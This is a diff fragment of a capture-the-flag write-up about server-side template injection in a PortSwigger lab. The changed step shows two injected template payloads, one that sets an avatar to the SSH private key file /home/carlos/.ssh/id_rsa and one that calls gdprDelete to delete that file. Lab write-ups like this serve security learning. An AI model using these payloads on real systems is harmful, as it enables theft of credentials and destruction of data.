sousa16/ctf-writeups/portswigger-websec-academy/ssti/ssti.md

 This payload makes it so that the avatar is the relevant php file, and a GET request to it allows us access to the file.

-4. We see there is a method called gdprDelete which happens to delete the avatar file. <br>
+4. We see there is a method called gdprDelete which happens to delete the avatar file.
-    ```
+    ```php
     blog-post-author-display=user.setAvatar("/home/carlos/.ssh/id_rsa","image/png")
     blog-post-author-display=user.gdprDelete()
     ```